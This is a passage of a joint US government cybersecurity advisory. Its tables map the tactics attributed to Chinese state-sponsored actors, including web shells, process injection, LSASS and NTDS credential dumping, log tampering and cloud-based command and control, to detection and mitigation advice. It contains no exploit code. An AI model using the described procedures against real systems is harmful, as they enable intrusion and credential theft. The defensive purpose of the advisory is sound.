Note: this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)] and Credential Access [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)].
|
* Monitor for policy changes to authentication mechanisms used by the domain controller.
* Monitor for modifications to functions exported from authentication DLLs (such as `cryptdll.dll` and `samsrv.dll`).
* Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.
* Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts (for example, one account logged into multiple systems simultaneously, multiple accounts logged into the same machine simultaneously, accounts logged in at odd times or outside of business hours).
* Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
* Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for and correlate changes to Registry entries.
|
Detect:
* Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]
* User Behavior Analysis
* Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)]
* User Geolocation Logon Pattern Analysis [[D3-UGLPA](<https://d3fend.mitre.org/technique/d3f:UserGeolocationLogonPatternAnalysis>)]
Server Software Component [[T1505](<https://attack.mitre.org/versions/v9/techniques/T1505>)]:
* Web Shell [[T1505.003](<https://attack.mitre.org/versions/v9/techniques/T1505/003>)]
|
Chinese state-sponsored cyber actors have been observed planting web shells on exploited servers and using them to provide the cyber actors with access to the victim networks.
|
* Use Intrusion Detection Systems (IDS) to monitor for and identify China Chopper traffic using IDS signatures.
* Monitor and search for predictable China Chopper shell syntax to identify infected files on hosts.
* Perform integrity checks on critical servers to identify and investigate unexpected changes.
* Have application developers sign their code using digital signatures to verify their identity.
* Identify and remediate web application vulnerabilities or configuration weaknesses. Employ regular updates to applications and host operating systems.
* Implement a least-privilege policy on web servers to reduce adversaries’ ability to escalate privileges or pivot laterally to other hosts and control creation and execution of files in particular directories.
* If not already present, consider deploying a DMZ between web-facing systems and the corporate network. Limiting the interaction and logging traffic between the two provides a method to identify possible malicious activity.
* Ensure secure configuration of web servers. All unnecessary services and ports should be disabled or blocked. Access to necessary services and ports should be restricted, where feasible. This can include allowlisting or blocking external access to administration panels and not using default login credentials.
* Use a reverse proxy or alternative service, such as mod_security, to restrict accessible URL paths to known legitimate ones.
* Establish, and backup offline, a “known good” version of the relevant server and a regular change management policy to enable monitoring for changes to servable content with a file integrity system.
* Employ user input validation to restrict exploitation of vulnerabilities.
* Conduct regular system and application vulnerability scans to establish areas of risk. While this method does not protect against zero-day exploits, it will highlight possible areas of concern.
* Deploy a web application firewall and conduct regular virus signature checks, application fuzzing, code reviews, and server network analysis.
|
Detect:
* Network Traffic Analysis
* Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
* Per Host Download-Upload Ratio Analysis [[D3-PHDURA](<https://d3fend.mitre.org/technique/d3f:PerHostDownload-UploadRatioAnalysis>)]
* Process Analysis
* Process Spawn Analysis
* Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
Create or Modify System Process [[T1543](<https://attack.mitre.org/versions/v9/techniques/T1543>)]:
* Windows Service [[T1543.003](<https://attack.mitre.org/versions/v9/techniques/T1543/003>)]
|
Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence.
**Note: **this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].
|
* Only allow authorized administrators to make service changes and modify service configurations.
* Monitor processes and command-line arguments for actions that could create or modify services, especially if such modifications are unusual in your environment.
* Monitor WMI and PowerShell for service modifications.
| Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
### Tactics: _Privilege Escalation_ [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)]
_Table VI: Chinese state-sponsored cyber actors’ Privilege Escalation TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Domain Policy Modification [[T1484](<https://attack.mitre.org/versions/v9/techniques/T1484>)]
* Group Policy Modification [[T1484.001](<https://attack.mitre.org/versions/v9/techniques/T1484/001>)]
|
Chinese state-sponsored cyber actors have also been observed modifying group policies for password exploitation.
**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].
|
* Identify and correct Group Policy Object (GPO) permissions abuse opportunities (e.g., GPO modification privileges) using auditing tools.
* Monitor directory service changes using Windows event logs to detect GPO modifications. Several events may be logged for such GPO modifications.
* Consider implementing WMI and security filtering to further tailor which users and computers a GPO will apply to.
|
Detect:
* Network Traffic Analysis
* Administrative Network Activity Analysis [[D3-ANAA](<https://d3fend.mitre.org/technique/d3f:AdministrativeNetworkActivityAnalysis>)]
* Platform Monitoring
* Operating System Monitoring
* System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]
Process Injection [[T1055](<https://attack.mitre.org/versions/v9/techniques/T1055>)]:
* Dynamic Link Library Injection [[T1055.001](<https://attack.mitre.org/versions/v9/techniques/T1055/001>)]
* Portable Executable Injection [[T1055.002](<https://attack.mitre.org/versions/v9/techniques/T1055/002>)]
|
Chinese state-sponsored cyber actors have been observed:
* Injecting into the `rundll32.exe` process to hide usage of Mimikatz, as well as injecting into a running legitimate `explorer.exe` process for lateral movement.
* Using shellcode that injects implants into newly created instances of the Service Host process (`svchost`)
**Note:** this technique also applies to Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].
|
* Use endpoint protection software to block process injection based on behavior of the injection process.
* Monitor DLL/Portable Executable (PE) file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process.
* Monitor for suspicious sequences of Windows API calls such as `CreateRemoteThread`, `VirtualAllocEx`, or `WriteProcessMemory` and analyze processes for unexpected or atypical behavior such as opening network connections or reading files.
* To minimize the probable impact of a threat actor using Mimikatz, always limit administrative privileges to only users who actually need it; upgrade Windows to at least version 8.1 or 10; run Local Security Authority Subsystem Service (LSASS) in protected mode on Windows 8.1 and higher; harden the local security authority (LSA) to prevent code injection.
|
* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]
### Tactics: _Defense Evasion _[[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)]
_Table VII: Chinese state-sponsored cyber actors’ Defensive Evasion TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Deobfuscate/Decode Files or Information [[T1140](<https://attack.mitre.org/versions/v9/techniques/T1140>)]
|
Chinese state-sponsored cyber actors were observed using the 7-Zip utility to unzip imported tools and malware files onto the victim device.
|
* Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.
* Consider blocking, disabling, or monitoring use of 7-Zip.
|
Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
Isolate:
* Execution Isolation
* Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)]
Hide Artifacts [[T1564](<https://attack.mitre.org/versions/v9/techniques/T1564>)]
|
Chinese state-sponsored cyber actors were observed using benign executables which used DLL load-order hijacking to activate the malware installation process.
|
* Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts, such as executables using DLL load-order hijacking that can activate malware.
* Monitor event and authentication logs for records of hidden artifacts being used.
* Monitor the file system and shell commands for hidden attribute usage.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
Isolate:
* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
Indicator Removal from Host [[T1070](<https://attack.mitre.org/versions/v9/techniques/T1070>)]
|
Chinese state-sponsored cyber actors have been observed deleting files using `rm` or `del` commands.
Several files that the cyber actors target would be timestomped, in order to show different times compared to when those files were created/used.
|
* Make the environment variables associated with command history read only to ensure that the history is preserved.
* Recognize timestomping by monitoring the contents of important directories and the attributes of the files.
* Prevent users from deleting or writing to certain files to stop adversaries from maliciously altering their `~/.bash_history` or `ConsoleHost_history.txt` files.
* Monitor for command-line deletion functions to correlate with binaries or other files that an adversary may create and later remove. Monitor for known deletion and secure deletion tools that are not already on systems within an enterprise network that an adversary could introduce.
* Monitor and record file access requests and file handles. An original file handle can be correlated to a compromise and inconsistencies between file timestamps and previous handles opened to them can be a detection rule.
|
Detect:
* Platform Monitoring
* Operating System Monitoring
* System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
Isolate:
* Execution Isolation
* Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]
Obfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v9/techniques/T1027>)]
|
Chinese state-sponsored cyber actors were observed Base64 encoding files and command strings to evade security measures.
|
Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 to analyze commands after being processed/interpreted.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
Signed Binary Proxy Execution [[T1218](<https://attack.mitre.org/versions/v9/techniques/T1218>)]
* `Mshta` [[T1218.005](<https://attack.mitre.org/versions/v9/techniques/T1218/005>)]
* `Rundll32` [[T1218.011](<https://attack.mitre.org/versions/v9/techniques/T1218/011>)]
|
Chinese state-sponsored cyber actors were observed using Microsoft signed binaries, such as `Rundll32`, as a proxy to execute malicious payloads.
|
Monitor processes for the execution of known proxy binaries (e.g., r`undll32.exe`) and look for anomalous activity that does not follow historically good arguments and loaded DLLs associated with the invocation of the binary.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
### Tactics: _Credential Access_ [[TA0006](<https://attack.mitre.org/versions/v9/tactics/TA0006>)]
_Table VIII: Chinese state-sponsored cyber actors’ Credential Access TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Exploitation for Credential Access [[T1212](<https://attack.mitre.org/versions/v9/techniques/T1212>)]
|
Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers.
|
* Update and patch software regularly.
* Use cyber threat intelligence and open-source reporting to determine vulnerabilities that threat actors may be actively targeting and exploiting; patch those vulnerabilities immediately.
|
Harden:
* Platform Hardening
* Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]
* Credential Hardening
* Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]
OS Credential Dumping [[T1003](<https://attack.mitre.org/versions/v9/techniques/T1003>)]
• LSASS Memory [[T1003.001](<https://attack.mitre.org/versions/v9/techniques/T1003/001>)]
• NTDS [[T1003.003](<https://attack.mitre.org/versions/v9/techniques/T1003/003>)]
|
Chinese state-sponsored cyber actors were observed targeting the LSASS process or Active directory (`NDST.DIT)` for credential dumping.
|
* Monitor process and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the `NDST.DIT`.
* Ensure that local administrator accounts have complex, unique passwords across all systems on the network.
* Limit credential overlap across accounts and systems by training users and administrators not to use the same passwords for multiple accounts.
* Consider disabling or restricting NTLM.
* Consider disabling `WDigest` authentication.
* Ensure that domain controllers are backed up and properly secured (e.g., encrypt backups).
* Implement Credential Guard to protect the LSA secrets from credential dumping on Windows 10. This is not configured by default and requires hardware and firmware system requirements.
* Enable Protected Process Light for LSA on Windows 8.1 and Windows Server 2012 R2.
|
Harden:
* Credential Hardening [[D3-CH](<https://d3fend.mitre.org/technique/d3f:CredentialHardening>)]
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
Isolate:
* Execution Isolation
* Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]
* Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]
### Tactics: _Discovery_ [[TA0007](<https://attack.mitre.org/versions/v9/tactics/TA0007>)]
_Table IX: Chinese state-sponsored cyber actors’ Discovery TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
File and Directory Discovery [[T1083](<https://attack.mitre.org/versions/v9/techniques/T1083>)]
|
Chinese state-sponsored cyber actors have been observed using multiple implants with file system enumeration and traversal capabilities.
|
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. WMI and PowerShell should also be monitored.
|
Detect:
* User Behavior Analysis
* Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]
* Process Analysis
* Database Query String Analysis [[D3-DQSA](<https://d3fend.mitre.org/technique/d3f:DatabaseQueryStringAnalysis>)]
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
Permission Group Discovery [[T1069](<https://attack.mitre.org/versions/v9/techniques/T1069>)]
|
Chinese state-sponsored cyber actors have been observed using commands, including `net group` and `net localgroup`, to enumerate the different user groups on the target network.
|
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
|
Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
Process Discovery [[T1057](<https://attack.mitre.org/versions/v9/techniques/T1057>)]
|
Chinese state-sponsored cyber actors have been observed using commands, including `tasklist`, `jobs`, `ps`, or `taskmgr`, to reveal the running processes on victim devices.
|
Normal, benign system and network events that look like process discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.
|
Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* System Call Analysis [[D3-SCA](<https://d3fend.mitre.org/technique/d3f:SystemCallAnalysis>)]
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
Network Service Scanning [[T1046](<https://attack.mitre.org/versions/v9/techniques/T1046>)]
|
Chinese state-sponsored cyber actors have been observed using `Nbtscan` and `nmap` to scan and enumerate target network information.
|
• Ensure that unnecessary ports and services are closed to prevent discovery and potential exploitation.
• Use network intrusion detection and prevention systems to detect and prevent remote service scans such as `Nbtscan` or `nmap`.
• Ensure proper network segmentation is followed to protect critical servers and devices to help mitigate potential exploitation.
|
Detect:
* Network Traffic Analysis
* Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
Remote System Discovery [[T1018](<https://attack.mitre.org/versions/v9/techniques/T1018>)]
|
Chinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including `ping`, `net group`, and `net user` to enumerate target network information.
|
Monitor for processes that can be used to discover remote systems, such as `ping.exe` and `tracert.exe`, especially when executed in quick succession.
|
Detect:
* Process Analysis
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
* User Behavior Analysis
* Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)]
### Tactics: _Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v9/tactics/TA0008>)]
_Table X: Chinese state-sponsored cyber actors’ Lateral Movement TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Exploitation of Remote Services [[T1210](<https://attack.mitre.org/versions/v9/techniques/T1210>)]
|
Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.
Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.
|
Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user.
Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources.
* Disable or remove unnecessary services.
* Minimize permissions and access for service accounts.
* Perform vulnerability scanning and update software regularly.
* Use threat intelligence and open-source exploitation databases to determine services that are targets for exploitation.
|
Detect:
* Network Traffic Analysis
* Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]
* User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)]
Isolate:
* Execution Isolation
* Mandatory Access Control [[D3-MAC](<https://d3fend.mitre.org/technique/d3f:MandatoryAccessControl>)]
### Tactics: _Collection_ [[TA0009](<https://attack.mitre.org/versions/v9/tactics/TA0009>)]
_Table XI: Chinese state-sponsored cyber actors’ Collection TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Archive Collected Data [[T1560](<https://attack.mitre.org/versions/v9/techniques/T1560>)]
|
Chinese state-sponsored cyber actors used compression and encryption of exfiltration files into RAR archives, and subsequently utilizing cloud storage services for storage.
|
* Scan systems to identify unauthorized archival utilities or methods unusual for the environment.
* Monitor command-line arguments for known archival utilities that are not common in the organization's environment.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
* Process Spawn Analysis [[D3-PSA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)]
Isolate:
* Execution Isolation
* Executable Denylisting [[D3-EDL](<https://d3fend.mitre.org/technique/d3f:ExecutableDenylisting>)]
Clipboard Data [[T1115](<https://attack.mitre.org/versions/v9/techniques/T1115>)]
|
Chinese state-sponsored cyber actors used RDP and execute `rdpclip.exe` to exfiltrate information from the clipboard.
|
* Access to the clipboard is a legitimate function of many applications on an operating system. If an organization chooses to monitor for this behavior, then the data will likely need to be correlated against other suspicious or non-user-driven activity (e.g. excessive use of `pbcopy/pbpaste` (Linux) or `clip.exe` (Windows) run by general users through command line).
* If possible, disable use of RDP and other file sharing protocols to minimize a malicious actor's ability to exfiltrate data.
|
Detect:
* Network Traffic Analysis
* Remote Terminal Session Detection [[D3-RTSD](<https://d3fend.mitre.org/technique/d3f:RemoteTerminalSessionDetection>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]
Data Staged [[T1074](<https://attack.mitre.org/versions/v9/techniques/T1074>)]
|
Chinese state-sponsored cyber actors have been observed using the `mv` command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network.
|
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as using 7-Zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
|
Detect:
* Process Analysis
* File Access Pattern Analysis [[D3-FAPA](<https://d3fend.mitre.org/technique/d3f:FileAccessPatternAnalysis>)]
Email Collection [[T1114](<https://attack.mitre.org/versions/v9/techniques/T1114>)]
|
Chinese state-sponsored cyber actors have been observed using the `New-MailboxExportReques`t PowerShell cmdlet to export target email boxes.
|
* Audit email auto-forwarding rules for suspicious or unrecognized rulesets.
* Encrypt email using public key cryptography, where feasible.
* Use MFA on public-facing mail servers.
|
Harden:
* Credential Hardening
* Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]
* Message Hardening
* Message Encryption [[D3-MENCR](<https://d3fend.mitre.org/technique/d3f:MessageEncryption>)]
Detect:
* Process Analysis [[D3-PA](<https://d3fend.mitre.org/technique/d3f:ProcessAnalysis>)]
### Tactics: _Command and Control _[[TA0011](<https://attack.mitre.org/versions/v9/tactics/TA0011>)]
_Table XII: Chinese state-sponsored cyber actors’ Command and Control TTPs with detection and mitigation recommendations_
Threat Actor Technique /
Sub-Techniques
| Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques
---|---|---|---
Application Layer Protocol [[T1071](<https://attack.mitre.org/versions/v9/techniques/T1071>)]
|
Chinese state-sponsored cyber actors have been observed:
* Using commercial cloud storage services for command and control.
* Using malware implants that use the Dropbox® API for C2 and a downloader that downloads and executes a payload using the Microsoft OneDrive® API.
|
Use network intrusion detection and prevention systems with network signatures to identify traffic for specific adversary malware.
|
Detect:
* Network Traffic Analysis
* Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
* File Carving [[D3-FC](<https://d3fend.mitre.org/technique/d3f:FileCarving>)]
Isolate:
* Network Isolation
* DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]
Ingress Tool Transfer [[T1105](<https://attack.mitre.org/versions/v9/techniques/T1105>)]
|
Chinese state-sponsored cyber actors have been observed importing tools from GitHub or infected domains to victim networks. In some instances. Chinese state-sponsored cyber actors used the Server Message Block (SMB) protocol to import tools into victim networks.
|
* Perform ingress traffic analysis to identify transmissions that are outside of normal network behavior.
* Do not expose services and protocols (such as File Transfer Protocol [FTP]) to the Internet without strong business justification.
* Use signature-based network intrusion detection and prevention systems to identify adversary malware coming into the network.
|
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
Non-Standard Port [[T1571](<https://attack.mitre.org/versions/v9/techniques/T1571>)]
|
Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure.
|
* Use signature-based network intrusion detection and prevention systems to identify adversary malware calling back to C2.
* Configure firewalls to limit outgoing traffic to only required ports based on the functions of that network segment.
* Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port.
|
Detect:
* Network Traffic Analysis
* Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]
* Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]
Isolate:
* Network Isolation
* Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)]
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]
Protocol Tunneling [[T1572](<https://attack.mitre.org/versions/v9/techniques/T1572>)]
|
Chinese state-sponsored cyber actors have been observed using tools like dog-tunnel and `dns2tcp.exe` to conceal C2 traffic with existing network activity.
|
* Monitor systems for connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.
* Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards.
* Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server)
|
Detect:
* Network Traffic Analysis
* Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]
Proxy [[T1090](<https://attack.mitre.org/versions/v9/techniques/T1090>)]:
* Multi-Hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v9/techniques/T1090/003>)]
|
Chinese state-sponsored cyber actors have been observed using a network of VPSs and small office and home office (SOHO) routers as part of their operational infrastructure to evade detection and host C2 activity. Some of these nodes operate as part of an encrypted proxy service to prevent attribution by concealing their country of origin and TTPs.
|
Monitor traffic for encrypted communications originating from potentially breached routers to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are authorized VPN connections or other encrypted modes of communication.
* Alert on traffic to known anonymity networks (such as Tor) or known adversary infrastructure that uses this technique.
* Use network allow and blocklists to block traffic to known anonymity networks and C2 infrastructure.
|
Detect:
* Network Traffic Analysis
* Protocol Metadata Anomaly Detection [[D3-PMAD](<https://d3fend.mitre.org/technique/d3f:ProtocolMetadataAnomalyDetection>)]
* Relay Pattern Analysis [[D3-RPA](<https://d3fend.mitre.org/technique/d3f:RelayPatternAnalysis>)]
Isolate:
* Network Isolation
* Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)]
### Appendix B: MITRE ATT&CK Framework

_Figure 2: MITRE ATT&CK Enterprise tactics and techniques used by Chinese state-sponsored cyber actors ([Click here for the downloadable JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>).) _
### Contact Information
To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).
For NSA client requirements or general cybersecurity inquiries, contact the NSA Cybersecurity Requirements Center at 410-854-4200 or [Cybersecurity_Requests@nsa.gov.](<mailto:Cybersecurity_Requests@nsa.gov>)
Media Inquiries / Press Desk:
• NSA Media Relations, 443-634-0721, [MediaRelations@nsa.gov](<mailto:MediaRelations@nsa.gov>)
• CISA Media Relations, 703-235-2010, [CISAMedia@cisa.dhs.gov](<mailto:CISAMedia@cisa.dhs.gov>)
• FBI National Press Office, 202-324-3691, [npo@fbi.gov](<mailto:npo@fbi.gov>)
### References
[[1] FireEye: This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>)
### Revisions
July 19, 2021: Initial Version
{"id": "AA21-200B", "vendorId": null, "type": "ics", "bulletinFamily": "info", "title": "Chinese State-Sponsored Cyber Operations: Observed TTPs", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, 